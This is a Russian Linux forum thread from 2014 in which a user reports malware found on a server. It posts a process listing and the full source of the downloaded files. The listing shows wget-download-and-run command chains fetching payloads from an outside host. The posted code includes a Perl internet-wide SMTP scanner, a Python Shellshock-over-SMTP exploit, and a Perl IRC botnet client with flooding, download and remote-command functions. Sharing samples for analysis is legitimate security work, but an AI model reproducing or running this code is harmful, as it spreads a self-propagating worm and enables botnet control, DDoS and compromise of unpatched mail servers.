anonymous@RULINUX.NET~# Last login: 2024-11-17 09:22:45
Регистрация Вход Новости | Разметка | Пользователи | Галерея | Форум | Статьи | Неподтвержденное | Трекер | Правила форума | F.A.Q. | Ссылки | Поиск
[#] [Добавить метку] [Редактировать]
Скрыть

я кажись вирус на перле и питоне нашел на одной машинке-сервере

выглядит так

text


kuvshin@www:~$ ps auxww | grep perl
root      1394  0.0  0.0  11616   292 ?        Ss   Nov03   0:00 /usr/local/Apache/bin/httpd-perl
www_user 13919  0.0  0.0   2784   348 ?        S    Nov06   0:00 sh -c wget http://m.uploadedit.com/b042/1415258281185.txt -O .smtp;wget http://m.uploadedit.com/b042/1415258365200.txt -O pyt;chmod +x pyt;chmod +x .smtp;perl .smtp;rm -rf .smtp 2>&1 3>&1
www_user 13922  0.0  0.0   2784   348 ?        S    Nov06   0:00 sh -c wget http://m.uploadedit.com/b042/1415258281185.txt -O .smtp;wget http://m.uploadedit.com/b042/1415258365200.txt -O pyt;chmod +x pyt;chmod +x .smtp;perl .smtp;rm -rf .smtp 2>&1 3>&1
www_user 13926  0.0  0.0   2780   348 ?        S    Nov06   0:00 sh -c wget http://m.uploadedit.com/b042/1415258281185.txt -O .smtp;wget http://m.uploadedit.com/b042/1415258365200.txt -O pyt;chmod +x pyt;chmod +x .smtp;perl .smtp;rm -rf .smtp 2>&1 3>&1
www_user 13930  0.0  0.0   2780   348 ?        S    Nov06   0:00 sh -c wget http://m.uploadedit.com/b042/1415258281185.txt -O .smtp;wget http://m.uploadedit.com/b042/1415258365200.txt -O pyt;chmod +x pyt;chmod +x .smtp;perl .smtp;rm -rf .smtp 2>&1 3>&1
www_user 13936  0.0  0.0   2780   348 ?        S    Nov06   0:00 sh -c wget http://m.uploadedit.com/b042/1415258281185.txt -O .smtp;wget http://m.uploadedit.com/b042/1415258365200.txt -O pyt;chmod +x pyt;chmod +x .smtp;perl .smtp;rm -rf .smtp 2>&1 3>&1
www_user 13947  0.0  0.0   4108   880 ?        S    Nov06   0:01 perl .smtp
www_user 13950  0.0  0.0   4104   880 ?        S    Nov06   0:01 perl .smtp
www_user 13951  0.0  0.0   4104   880 ?        S    Nov06   0:01 perl .smtp
www_user 13954  0.0  0.0   4104   880 ?        S    Nov06   0:01 perl .smtp
www_user 13965  0.0  0.0   4100   880 ?        S    Nov06   0:01 perl .smtp
www_user 14627  0.0  0.0   2784   348 ?        S    Nov06   0:00 sh -c wget http://m.uploadedit.com/b042/1415258281185.txt -O .smtp;wget http://m.uploadedit.com/b042/1415258365200.txt -O pyt;chmod +x pyt;chmod +x .smtp;perl .smtp 2>&1 3>&1
www_user 14630  0.0  0.0   2780   348 ?        S    Nov06   0:00 sh -c wget http://m.uploadedit.com/b042/1415258281185.txt -O .smtp;wget http://m.uploadedit.com/b042/1415258365200.txt -O pyt;chmod +x pyt;chmod +x .smtp;perl .smtp 2>&1 3>&1
www_user 14634  0.0  0.0   2784   348 ?        S    Nov06   0:00 sh -c wget http://m.uploadedit.com/b042/1415258281185.txt -O .smtp;wget http://m.uploadedit.com/b042/1415258365200.txt -O pyt;chmod +x pyt;chmod +x .smtp;perl .smtp 2>&1 3>&1
www_user 14637  0.0  0.0   2780   348 ?        S    Nov06   0:00 sh -c wget http://m.uploadedit.com/b042/1415258281185.txt -O .smtp;wget http://m.uploadedit.com/b042/1415258365200.txt -O pyt;chmod +x pyt;chmod +x .smtp;perl .smtp 2>&1 3>&1
www_user 14641  0.0  0.0   2784   348 ?        S    Nov06   0:00 sh -c wget http://m.uploadedit.com/b042/1415258281185.txt -O .smtp;wget http://m.uploadedit.com/b042/1415258365200.txt -O pyt;chmod +x pyt;chmod +x .smtp;perl .smtp 2>&1 3>&1
www_user 14650  0.0  0.0   4104   880 ?        S    Nov06   0:01 perl .smtp
www_user 14653  0.0  0.0   4108   880 ?        S    Nov06   0:01 perl .smtp
www_user 14656  0.0  0.0   4108   880 ?        S    Nov06   0:01 perl .smtp
www_user 14663  0.0  0.0   4100   880 ?        S    Nov06   0:01 perl .smtp
www_user 14676  0.0  0.0   4104   880 ?        S    Nov06   0:01 perl .smtp
www_user 16548  0.0  0.0   2780   348 ?        S    Nov06   0:00 sh -c wget http://m.uploadedit.com/b042/1415259863600.txt -O /tmp/.smtp2;chmod +x /tmp/.smtp2;perl /tmp/.smtp2 2>&1 3>&1
www_user 16550  0.0  0.0   2780   348 ?        S    Nov06   0:00 sh -c wget http://m.uploadedit.com/b042/1415259863600.txt -O /tmp/.smtp2;chmod +x /tmp/.smtp2;perl /tmp/.smtp2 2>&1 3>&1
www_user 16555  0.0  0.0   2776   348 ?        S    Nov06   0:00 sh -c wget http://m.uploadedit.com/b042/1415259863600.txt -O /tmp/.smtp2;chmod +x /tmp/.smtp2;perl /tmp/.smtp2 2>&1 3>&1
www_user 16559  0.0  0.0   2780   348 ?        S    Nov06   0:00 sh -c wget http://m.uploadedit.com/b042/1415259863600.txt -O /tmp/.smtp2;chmod +x /tmp/.smtp2;perl /tmp/.smtp2 2>&1 3>&1
www_user 16562  0.0  0.0   4100   880 ?        S    Nov06   0:01 perl /tmp/.smtp2
www_user 16568  0.0  0.0   4104   880 ?        S    Nov06   0:01 perl /tmp/.smtp2
www_user 16572  0.0  0.0   4108   880 ?        S    Nov06   0:01 perl /tmp/.smtp2
www_user 16582  0.0  0.0   2776   348 ?        S    Nov06   0:00 sh -c wget http://m.uploadedit.com/b042/1415259863600.txt -O /tmp/.smtp2;chmod +x /tmp/.smtp2;perl /tmp/.smtp2 2>&1 3>&1
www_user 16585  0.0  0.0   4104   880 ?        S    Nov06   0:01 perl /tmp/.smtp2
www_user 16593  0.0  0.0   4100   880 ?        S    Nov06   0:01 perl /tmp/.smtp2
www_user 17981  0.0  0.0   2784   348 ?        S    Nov06   0:00 sh -c wget http://m.uploadedit.com/b042/1415260702980.txt -O /tmp/.rnd;wget http://m.uploadedit.com/b042/1415258365200.txt -O /tmp/;chmod +x /tmp/pyt;chmod +x /tmp/.rnd;perl /tmp/.rnd 2>&1 3>&1
www_user 17985  0.0  0.0   2784   348 ?        S    Nov06   0:00 sh -c wget http://m.uploadedit.com/b042/1415260702980.txt -O /tmp/.rnd;wget http://m.uploadedit.com/b042/1415258365200.txt -O /tmp/;chmod +x /tmp/pyt;chmod +x /tmp/.rnd;perl /tmp/.rnd 2>&1 3>&1
www_user 17988  0.0  0.0   2784   348 ?        S    Nov06   0:00 sh -c wget http://m.uploadedit.com/b042/1415260702980.txt -O /tmp/.rnd;wget http://m.uploadedit.com/b042/1415258365200.txt -O /tmp/;chmod +x /tmp/pyt;chmod +x /tmp/.rnd;perl /tmp/.rnd 2>&1 3>&1
www_user 17992  0.0  0.0   2784   348 ?        S    Nov06   0:00 sh -c wget http://m.uploadedit.com/b042/1415260702980.txt -O /tmp/.rnd;wget http://m.uploadedit.com/b042/1415258365200.txt -O /tmp/;chmod +x /tmp/pyt;chmod +x /tmp/.rnd;perl /tmp/.rnd 2>&1 3>&1
www_user 17996  0.0  0.0   2784   348 ?        S    Nov06   0:00 sh -c wget http://m.uploadedit.com/b042/1415260702980.txt -O /tmp/.rnd;wget http://m.uploadedit.com/b042/1415258365200.txt -O /tmp/;chmod +x /tmp/pyt;chmod +x /tmp/.rnd;perl /tmp/.rnd 2>&1 3>&1
www_user 18004  0.0  0.0   4104   880 ?        S    Nov06   0:00 perl /tmp/.rnd
www_user 18008  0.0  0.1   4104  2012 ?        S    Nov06   0:01 perl /tmp/.rnd
www_user 18012  0.0  0.1   4104  2028 ?        S    Nov06   0:05 perl /tmp/.rnd
www_user 18017  0.0  0.2   4100  2124 ?        S    Nov06   0:03 perl /tmp/.rnd
www_user 18021  0.0  0.1   4100  1976 ?        S    Nov06   0:01 perl /tmp/.rnd
www_user 18098  0.0  0.0   2776   348 ?        S    Nov06   0:00 sh -c perl /tmp/.rnd 2>&1 3>&1
www_user 18099  6.7  0.1   3976  1948 ?        R    Nov06 221:36 perl /tmp/.rnd
www_user 18102  0.0  0.0   2772   348 ?        S    Nov06   0:00 sh -c perl /tmp/.rnd 2>&1 3>&1
www_user 18105  0.0  0.0   2780   348 ?        S    Nov06   0:00 sh -c perl /tmp/.rnd 2>&1 3>&1
www_user 18106  0.0  0.0   4100   880 ?        S    Nov06   0:00 perl /tmp/.rnd
www_user 18109  0.0  0.0   2776   348 ?        S    Nov06   0:00 sh -c perl /tmp/.rnd 2>&1 3>&1
www_user 18110  0.0  0.0   4104   880 ?        S    Nov06   0:01 perl /tmp/.rnd
www_user 18113  0.0  0.0   2776   348 ?        S    Nov06   0:00 sh -c perl /tmp/.rnd 2>&1 3>&1
www_user 18114  0.0  0.1   4104  2024 ?        S    Nov06   0:27 perl /tmp/.rnd
www_user 18119  0.0  0.0   2780   348 ?        S    Nov06   0:00 sh -c perl /tmp/.rnd 2>&1 3>&1
www_user 18120  0.0  0.1   4104  2040 ?        S    Nov06   0:13 perl /tmp/.rnd
www_user 18123  0.0  0.0   2772   348 ?        S    Nov06   0:00 sh -c perl /tmp/.rnd 2>&1 3>&1
www_user 18124  0.0  0.1   4104  2000 ?        S    Nov06   0:05 perl /tmp/.rnd
www_user 18127  0.0  0.0   2780   348 ?        S    Nov06   0:00 sh -c perl /tmp/.rnd 2>&1 3>&1
www_user 18128  0.0  0.1   4100  2012 ?        S    Nov06   0:01 perl /tmp/.rnd
www_user 18133  0.0  0.0   2776   348 ?        S    Nov06   0:00 sh -c perl /tmp/.rnd 2>&1 3>&1
www_user 18134  0.0  0.0   4100   880 ?        S    Nov06   0:03 perl /tmp/.rnd
www_user 18135  0.0  0.1   4104  2016 ?        S    Nov06   0:18 perl /tmp/.rnd
www_user 18138  0.0  0.0   2772   348 ?        S    Nov06   0:00 sh -c perl /tmp/.rnd 2>&1 3>&1
www_user 18139  0.0  0.1   4100  1992 ?        S    Nov06   0:01 perl /tmp/.rnd
www_user 18142  0.0  0.0   2776   348 ?        S    Nov06   0:00 sh -c perl /tmp/.rnd 2>&1 3>&1
www_user 18143  0.0  0.1   4100  2000 ?        S    Nov06   0:00 perl /tmp/.rnd
www_user 18146  0.0  0.0   2772   348 ?        S    Nov06   0:00 sh -c perl /tmp/.rnd 2>&1 3>&1
www_user 18147  0.0  0.1   4104  1988 ?        S    Nov06   0:01 perl /tmp/.rnd
www_user 18150  0.0  0.0   2780   348 ?        S    Nov06   0:00 sh -c perl /tmp/.rnd 2>&1 3>&1
www_user 18151  6.7  0.1   3976  1936 ?        R    Nov06 219:47 perl /tmp/.rnd
www_user 18154  0.0  0.0   2780   348 ?        S    Nov06   0:00 sh -c perl /tmp/.rnd 2>&1 3>&1
www_user 18157  0.0  0.0   2772   348 ?        S    Nov06   0:00 sh -c perl /tmp/.rnd 2>&1 3>&1
www_user 18158  0.0  0.0   4104   880 ?        S    Nov06   0:00 perl /tmp/.rnd
www_user 18160  0.0  0.1   4104  2016 ?        S    Nov06   0:08 perl /tmp/.rnd
www_user 18199  0.0  0.0   2780   348 ?        S    Nov06   0:00 sh -c perl /tmp/.rnd 2>&1 3>&1
www_user 18202  0.0  0.0   2780   348 ?        S    Nov06   0:00 sh -c perl /tmp/.rnd 2>&1 3>&1
www_user 18203  0.0  0.1   4108  2016 ?        R    Nov06   0:03 perl /tmp/.rnd
www_user 18207  0.0  0.0   2776   348 ?        S    Nov06   0:00 sh -c perl /tmp/.rnd 2>&1 3>&1
www_user 18210  0.0  0.0   2780   348 ?        S    Nov06   0:00 sh -c perl /tmp/.rnd 2>&1 3>&1
www_user 18212  6.7  0.1   3976  1912 ?        R    Nov06 219:02 perl /tmp/.rnd
www_user 18213  0.0  0.1   4100  2008 ?        S    Nov06   0:01 perl /tmp/.rnd
www_user 18214  0.0  0.1   4100  2024 ?        S    Nov06   0:04 perl /tmp/.rnd
www_user 18217  0.0  0.0   2776   348 ?        S    Nov06   0:00 sh -c perl /tmp/.rnd 2>&1 3>&1
www_user 18218  0.0  0.1   4100  1992 ?        S    Nov06   0:01 perl /tmp/.rnd
www_user  1702  0.0  0.0   5744   384 ?        S    Nov06   0:00 python pyt 181.59.60.227 wget http://yourschool.net/.tmp/frogclog.php?SMTP=181.59.60.227;wget http://m.uploadedit.com/b042/1415253981797.txt -O /tmp/.goad;chmod +x /tmp/.goad;perl /tmp/.goad
www_user  5835  0.0  0.0   5744   384 ?        S    Nov06   0:00 python pyt 31.30.12.75 wget http://yourschool.net/.tmp/frogclog.php?SMTP=31.30.12.75;wget http://m.uploadedit.com/b042/1415253981797.txt -O /tmp/.goad;chmod +x /tmp/.goad;perl /tmp/.goad
www_user  1851  0.0  0.0   5768   384 ?        S    Nov06   0:00 python pyt 59.86.194.104 wget http://yourschool.net/.tmp/frogclog.php?SMTP=59.86.194.104;wget http://m.uploadedit.com/b042/1415253981797.txt -O /tmp/.goad;chmod +x /tmp/.goad;perl /tmp/.goad
www_user 22400  0.0  0.0   5764   384 ?        S    Nov06   0:00 python pyt 93.192.222.59 wget http://yourschool.net/.tmp/frogclog.php?SMTP=93.192.222.59;wget http://m.uploadedit.com/b042/1415253981797.txt -O /tmp/.goad;chmod +x /tmp/.goad;perl /tmp/.goad
www_user 14323  0.0  0.0   5748   384 ?        S    Nov06   0:00 python pyt 93.180.154.84 wget http://m.uploadedit.com/b042/1415253981797.txt -O /tmp/.goad;chmod +x /tmp/.goad;perl /tmp/.goad
www_user 14503  0.0  0.0   5748   384 ?        S    Nov06   0:00 python pyt 93.180.154.84 wget http://m.uploadedit.com/b042/1415253981797.txt -O /tmp/.goad;chmod +x /tmp/.goad;perl /tmp/.goad
www_user 14539  0.0  0.0   5748   384 ?        S    Nov06   0:00 python pyt 93.180.154.84 wget http://m.uploadedit.com/b042/1415253981797.txt -O /tmp/.goad;chmod +x /tmp/.goad;perl /tmp/.goad
www_user 14562  0.0  0.0   5748   384 ?        S    Nov06   0:00 python pyt 93.180.154.84 wget http://m.uploadedit.com/b042/1415253981797.txt -O /tmp/.goad;chmod +x /tmp/.goad;perl /tmp/.goad
www_user 14667  0.0  0.0   5744   384 ?        S    Nov06   0:00 python pyt 93.180.154.84 wget http://m.uploadedit.com/b042/1415253981797.txt -O /tmp/.goad;chmod +x /tmp/.goad;perl /tmp/.goad
www_user  5673  0.0  0.0   5768   384 ?        S    Nov07   0:00 python pyt 223.202.59.75 wget http://yourschool.net/.tmp/frogclog.php?SMTP=223.202.59.75;wget http://m.uploadedit.com/b042/1415253981797.txt -O /tmp/.goad;chmod +x /tmp/.goad;perl /tmp/.goad
www_user 17668  0.1  1.8  23544 19284 ?        R    17:51   0:03 /usr/local/Apache/bin/httpd-perl
www_user 18103  0.1  1.8  22928 18620 ?        S    17:54   0:03 /usr/local/Apache/bin/httpd-perl
www_user 18131  0.1  1.8  23288 18884 ?        S    17:54   0:03 /usr/local/Apache/bin/httpd-perl
www_user 18165  0.1  3.6  41552 37216 ?        S    17:54   0:03 /usr/local/Apache/bin/httpd-perl
www_user 18246  0.1  2.3  28216 23932 ?        S    17:55   0:02 /usr/local/Apache/bin/httpd-perl
www_user 18254  0.1  2.9  35460 31000 ?        S    17:55   0:03 /usr/local/Apache/bin/httpd-perl
www_user 18255  0.1  2.0  25128 20812 ?        S    17:55   0:02 /usr/local/Apache/bin/httpd-perl
www_user 18267  0.1  1.8  23452 19152 ?        S    17:55   0:03 /usr/local/Apache/bin/httpd-perl
www_user 22528  0.0  0.2   4220  2756 ?        R    18:26   0:00 /usr/bin/perl -w /usr/local/etc/httpd/pereplet/cgi-bin/news.cgi
kuvshin  22530  0.0  0.0   1772   624 pts/0    S+   18:26   0:00 grep perl

 

vilfred(*) (2014-11-08 18:51:33)
Отредактировано vilfred по причине "не указана"

[Ответить на это сообщение]
avatar
Скрыть

Re:я кажись вирус на перле нашел на одной машинке-сервере

http://m.uploadedit.com/b042/1415258281185.txt

text


#!/usr/bin/perl -w

use Sys::Hostname;
use Socket;
use IO::Socket;


my($addr)=inet_ntoa((gethostbyname(hostname))[4]);
# print "$addr\n";
$ARGV[0] = $addr;
$ARGV[1] = "255.255.255.255";
$ARGV[2] = "25";
$ARGV[3] = "25";

# Check for port errors
if(($ARGV[2] > $ARGV[3]) || ($ARGV[2] > 65666) || ($ARGV[3] > 65666)){
  print "Port error.\n";
  exit 1;
}
 
# Check for IP address errors
@sip = split(/\./, $ARGV[0]);
@eip = split(/\./, $ARGV[1]);
for($x = 0; $x < 4; ++$x){
  if(($sip[$x] > 255) || ($eip[$x] > 255)){
    print "IP address error.\n";
    exit 1;
  }
}
$p = 0;
print "Scanning...\n\n";
while(1){
  $cip = join('.', @sip);
  $cmd = "python pyt $cip 'wget http://yourschool.net/.tmp/frogclog.php?SMTP=$cip'";
  IO::Socket::INET->new(PeerAddr=>($cip),PeerPort=>$p,proto=>'tcp',Timeout=>1) and print "$cip:$p\n" and system($cmd);
  if($p == $ARGV[3]){
      $sip[3] += "1";
      $p = $ARGV[2];
  } else {
      ++$p;
  }
  if($sip[3] > "255"){
    $sip[2] += "1";
    $sip[3] = "0";
  }
  if($sip[2] > "255"){
    $sip[1] += "1";
    $sip[2] = "0";
  }
  if($sip[1] > "255"){
    $sip[0] += "1";
    $sip[1] = "0";
  }
  if($ARGV[1] =~ /$cip/){
    print "\nScan completed.\n";
    exit 1;
  }
}
exit;

 

vilfred(*)(2014-11-08 18:53:22)
Отредактировано vilfred по причине "не указана"
avatar
Скрыть

Re:я кажись вирус на перле нашел на одной машинке-сервере

http://m.uploadedit.com/b042/1415258365200.txt

text


#!/bin/python
 
from socket import *
import sys
 
def usage():
    print "shellshock_smtp.py <target> <command>"
 
argc = len(sys.argv)
if(argc < 3 or argc > 3):
    usage()
    sys.exit(0)
 
rport = 25
rhost = sys.argv[1]
cmd = sys.argv[2]
 
headers = ([
    "To",
    "References",
    "Cc",
    "Bcc",
    "From",
    "Subject",
    "Date",
    "Message-ID",
    "Comments",
    "Keywords",
    "Resent-Date",
    "Resent-From",
    "Resent-Sender"
    ])
 
s = socket(AF_INET, SOCK_STREAM)
s.connect((rhost, rport))
 
# banner grab
s.recv(2048*4)
 
def netFormat(d):
    d += "\n"
    return d.encode('hex').decode('hex')
 
data = netFormat("mail from:<>")
s.send(data)
s.recv(2048*4)
 
data = netFormat("rcpt to:<nobody>")
s.send(data)
s.recv(2048*4)
 
data = netFormat("data")
s.send(data)
s.recv(2048*4)
 
data = ''
for h in headers:
    data += netFormat(h + ":() { :; };" + cmd)
 
data += netFormat(cmd)
 
# <CR><LF>.<CR><LF>
data += "0d0a2e0d0a".decode('hex')
 
s.send(data)
s.recv(2048*4)
 
data = netFormat("quit")
s.send(data)
s.recv(2048*4)

 

vilfred(*)(2014-11-08 18:54:01)
Отредактировано vilfred по причине "не указана"
avatar
Скрыть

Re:я кажись вирус на перле нашел на одной машинке-сервере

http://m.uploadedit.com/b042/1415259863600.txt

text


#!/usr/bin/perl -w

use Sys::Hostname;
use Socket;
use IO::Socket;


my($addr)=inet_ntoa((gethostbyname(hostname))[4]);
# print "$addr\n";
$ARGV[0] = $addr;
$ARGV[1] = "255.255.255.255";
$ARGV[2] = "25";
$ARGV[3] = "25";

# Check for port errors
if(($ARGV[2] > $ARGV[3]) || ($ARGV[2] > 65666) || ($ARGV[3] > 65666)){
  print "Port error.\n";
  exit 1;
}
 
# Check for IP address errors
@sip = split(/\./, $ARGV[0]);
@eip = split(/\./, $ARGV[1]);
for($x = 0; $x < 4; ++$x){
  if(($sip[$x] > 255) || ($eip[$x] > 255)){
    print "IP address error.\n";
    exit 1;
  }
}
$p = 0;
print "Scanning...\n\n";
while(1){
  $cip = join('.', @sip);
  $cmd = "python pyt $cip 'wget http://m.uploadedit.com/b042/1415253981797.txt -O /tmp/.goad;chmod +x /tmp/.goad;perl /tmp/.goad'";
  IO::Socket::INET->new(PeerAddr=>($cip),PeerPort=>$p,proto=>'tcp',Timeout=>1) and print "$cip:$p\n" and system($cmd);
  if($p == $ARGV[3]){
      $sip[3] += "1";
      $p = $ARGV[2];
  } else {
      ++$p;
  }
  if($sip[3] > "255"){
    $sip[2] += "1";
    $sip[3] = "0";
  }
  if($sip[2] > "255"){
    $sip[1] += "1";
    $sip[2] = "0";
  }
  if($sip[1] > "255"){
    $sip[0] += "1";
    $sip[1] = "0";
  }
  if($ARGV[1] =~ /$cip/){
    print "\nScan completed.\n";
    exit 1;
  }
}
exit;

 

vilfred(*)(2014-11-08 18:55:52)
Отредактировано vilfred по причине "не указана"
avatar
Скрыть

Re:я кажись вирус на перле нашел на одной машинке-сервере

http://m.uploadedit.com/b042/1415253981797.txt

text


#!/usr/bin/perl
####################################################################################################################
####################################################################################################################
##  ps Perl IrcBot v1.02012 bY CrAmEr @ps Security Team   ##    [ Help ]   ####################################
##      Stealth MultiFunctional IrcBot Writen in Perl          #####################################################
##        Teste on every system with PERL instlled             ##  !x @system                                     ##
##                                                             ##  !x @version                                    ##
##     This is a free program used on your own risk.           ##  !x @channel                                    ##
##        Created for educational purpose only.                ##  !x @flood                                      ##
## I'm not responsible for the illegal use of this program.    ##  !x @utils                                      ##
####################################################################################################################
## [ Channel ] #################### [ Flood ] ################################## [ Utils ] #########################
####################################################################################################################
## !x !join <#channel>          ## !x @udp1 <ip> <port> <time>              ##  !su @conback <ip> <port>          ##
## !x !part <#channel>          ## !x @udp2 <ip> <packet size> <time>       ##  !x @downlod <url+path> <file>     ##
## !x !xejoin <#channel>        ## !x @udp3 <ip> <port> <time>              ##  !x @portscan <ip>                 ##
## !x !op <channel> <nick>      ## !x @tcp <ip> <port> <packet size> <time> ##  !x @mail <subject> <sender>       ##
## !x !deop <channel> <nick>    ## !x @http <site> <time>                   ##           <recipient> <message>    ##
## !x !voice <channel> <nick>   ##                                          ##  !x pwd;uname -a;id <for example>  ##
## !x !devoice <channel> <nick> ## !x @ctcpflood <nick>                     ##  !x @port <ip> <port>              ##
## !x !nick <newnick>           ## !x @msgflood <nick>                      ##  !x @dns <ip/host>                 ##
## !x !msg <nick>               ## !x @noticeflood <nick>                   ##                                    ##
## !x !quit                     ##                                          ##                                    ##
## !x !xaw                      ##                                          ##                                    ##
## !x !die                      ##                                          ##                                    ##
####################################################################################################################
####################################################################################################################
 
#############################
##### [ Configuration ] #####
#############################
 
my @rps = ("/usr/local/nagios/bin/nrpe -c /usr/local/nagios/etc/nrpe.cfg -d");
my $process = $rps[rand scalar @rps];
my @rversion = ("\001VERSION - unknown command.\001",
                                "\001mIRC v5.91 K.Mardam-Bey\001",
                                "\001mIRC v6.2 Khaled Mardam-Bey\001",
                                "\001mIRC v6.03 Khaled Mardam-Bey\001",
                                "\001mIRC v6.14 Khaled Mardam-Bey\001",
                                "\001mIRC v6.15 Khaled Mardam-Bey\001",
                                "\001mIRC v6.16 Khaled Mardam-Bey\001",
                                "\001mIRC v6.17 Khaled Mardam-Bey\001",
                                "\001mIRC v6.21 Khaled Mardam-Bey\001",
                                "\001mIRC v6.31 Khaled Mardam-Bey\001",
                                "\001mIRC v7.15 Khaled Mardam-Bey\001");
my $vers = $rversion[rand scalar @rversion];
my @rircname = ("abbore","ably","abyss","acrima","aerodream","afkdemon","ainthere","alberto","alexia","alexndra",
                                "alias","alikki","alphaa","alterego","alvin","ambra","amed","andjela","andreas","anja",
                                "anjing","anna","apeq","arntz","arskaz","as","asmodizz","asssa","athanas","aulis",
                                "aus","bar","bast","bedem","beeth","bella","birillo","bizio","blackhand","blacky",
                                "blietta","blondenor","blueangel","bluebus","bluey","bobi","bopoh","borre","boy","bram",
                                "brigitta","brio","brrrweg","brujah","caprcorn","carloto","catgirl","cathren","cemanmp","chainess",
                                "chaingone","chck","chriz","cigs","cintat","clarissa","clbiz","clex","cobe","cocker",
                                "coke","colin","conan","condoom","coop","coopers","corvonero","countzero","cracker","cread",
                                "crnaruka","cruizer","cubalibre","cure","custodes","dan","dangelo","danic","daniela","dario",
                                "darker","darknz","davide","daw","demigd","des","devastor","diabolik","dimkam","dital",
                                "djtt","dogzzz","dolfi","dolphin","dottmorte","dracon","dragon","drtte","dumbblnd","dusica",
                                "ebe","edgie","eggist","einaimou","elef","elly","emmi","encer","engerim","erixon",
                                "eurotrash","fairsight","fin","fireaway","fjortisch","floutti","fluffer","flum","forever","fqw",
                                "fra","freem","freew","freud","funny","furia","furunkuli","fwsmou","gad","gamppy",
                                "gerhard","ghostie","gili","girlie","giugno","gizmo","glidaren","gold","gomora","gracie",
                                "grave","graz","grron","gsund","gufoao","hali","hallas","hammer","harri","harry",
                                "hayes","hazor","herbiez","hlios","hoffi","honeii","hongkong","hug","iasv","ibanez",
                                "ibanz","ibar","igi","illusins","imp","inkworks","iplord","ivan","ja","jaffa",
                                "jaimeafk","james","jamezdin","janet","janne","jason","javagrl","jayc","jazz",
                                "jejborta","jester","jj","jn","jockey","joe","joelbitar","johannes","johndow","johnny",
                                "joni","jonni","jornx","joshua","jossumi","judy","juge","juha","juhas","julze",
                                "juutsu","kajman","kalca","kamileon","kardinal","kasandra","katarina","kaviee","kbee","ken",
                                "keung","kewin","khan","kikeli","kikii","kilroi","kiwi","klaara","kliimax","klimas",
                                "kode","kojv","koopal","kralj","krash","krista","kronos","ktx","kungen","kuppa",
                                "kurai","lala","lamour","latina","legend","lenisaway","lily","linda","lingyee","linux",
                                "lisa","lisha","litta","littleboy","liverpoo","liyen","liz","liza","lonely","lonelygal",
                                "lonewolf","lopez","lordie","lovebyte","lph","luarbiasa","lucignol","lullaby","lunatic","luny",
                                "lupo","mac","macesgl","madd","mailman","malkav","malr","mamakians","mamaw","manarimou",
                                "manarisou","maradona","marakana","marco","marillion","mark","mary","master","maurino","max",
                                "mcalcota","melanie","melinda","meph","mephisto","mg","mhj","mhz","mig","miina",
                                "mika","mikav","mike","mikemcgii","mikko","mikma","mimma","miss","moladmin","monikaw",
                                "monkeyboy","monroe","monstop","mooks","mordeshur","mpdike","mrbate","mrbeauty","mrblom","mrbx",
                                "mrjee","mro","mrtabizy","mrx","mrxx","msd","mu","muimui","musashi","musc",
                                "musce","musicgal","muti","myboy","mystr","mythic","mywife","nallllle","nanask","natalie",
                                "natborta","ncubus","neutrino","niceguy","nico","niklas","nimfa","nino","nurul","obiwanbip",
                                "ogre","olivia","omega","only","orac","orace","oranzzzzz","organza","ourlove","outworld",
                                "outzake","oxygn","paliadog","pazarac","permaloso","perroz","pessaar","phre","phreaky","pihkal",
                                "pinball","poesje","poison","poofie","popy","powerpc","pper","primera","primetime","proxyma",
                                "pshyche","psioncore","psiximou","psixisou","psychosis","psyidle","pszaah","puppetm","pzzzz",
                                "quattro","question","ra","ragio","ragnetto","raiden","raindance","raistln","ranu","raska",
                                "raul","raye","reartu","red","reflect","ribica","richard","rick","rigo","rikuta",
                                "rikuxr","rita","rix","rob","roku","ronaldo","ronwrl","roticanai","rugiada","ruthless",
                                "saalut","sammi","sand","satanins","schzsh","scorpin","sealink","sean","secret","serpentor",
                                "servant","sethi","sexbolek","sexyman","sharmm","shearer","shekel","shio","shortys","shred",
                                "sidewalk","sil","siren","skar","skill","skru","sky","skygun","skylink","slaktarn",
                                "slash","slgon","smarties","smck","snake","snike","snoopgirl","sodoma","sopocani","sorceress",
                                "spacebbl","spacedump","spanker","spermboy","spirtouli","srk","stazzz","steve","stinga","stj",
                                "stjf","studenica","stussy","suez","suhoj","sukun","sunsola","surfer","sutera","svearike",
                                "sweetii","sweetlady","sweklopi","swepilot","switch","syncphos","szern","takumura","tallaxlc","tampone",
                                "tarabas","tatano","tato","tennis","tenx","terence","terkukur","tero","thefox","thesint",
                                "timer","timewalk","tmhd","tnxfck","to","tomihki","tommy","topo","triumph","trustme",
                                "tungau","tupac","turbozzzz","turing","tvrdjava","tysn","unicron","uoff","uptimer","utopia",
                                "vader","vaismi","vajje","vanda","varjo","vass","vento","venusguy","vertie","viagara",
                                "vicious","vidxxx","virex","vodafone","vone","vrgnie","vuubeibe","wanderer","warrr","wasabboy",
                                "weebee","wellu","wendy","whiskey","willgood","wing","winny","wknight","wlly","wolfman",
                                "wow","wp","xarasou","xtreme","xxx","xzone","yakzr","yang","yashy","yasin",
                                "yenyen","ykbug","yogiebear","zai","zfstr","zinj","zizu","zvezda","zwimou","zwisou",
                                "zwsiew","zwsiewale");
my $ircname = $rircname[rand scalar @rircname];
## my @rrealname = ("4,1[ ps Security Team ]",
##                  "4,1 /!\ ps Security Team /!\ ",
##                  "2,1---=== 4,1 ps Security Team 2,1===---");
## chop (my $realname = $rrealname[rand scalar @rrealname]);
 
chop (my $realname = `uname -sr`);
 
my $nick =$rircname[rand scalar @rircname];
 
$server = 'mx2.ma.cx' unless $server;
my $port = '443';
 
my $linas_max='8';
my $sleep='5';
 
my $homedir = "/etc/asterisk";
my $version = 'ps Perl Bot v1.0';
 
my @admins = ("a","root");
my @hostauth = ("x");
my @channels = ("#chat");
 
my $pacotes = 1;
 
#################################################################
##### [ Stop Editing if you dont know what are you doing. ] #####
#################################################################
 
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
 
use Socket;
use IO::Socket;
use IO::Socket::INET;
use IO::Select;
 
chdir("$homedir");
 
$server="$ARGV[0]" if $ARGV[0];
$0="$process"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Can't fork in background: $!" unless defined($pid);
 
our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();
$sel_cliente = IO::Select->new();
sub sendraw {
  if ($#_ == '1') {
    my $socket = $_[0];
    print $socket "$_[1]\n";
  } else {
    print $IRC_cur_socket "$_[0]\n";
  }
}
 
sub getstore ($$)
{
  my $url = shift;
  my $file = shift;
  $http_stream_out = 1;
  open(GET_OUTFILE, "> $file");
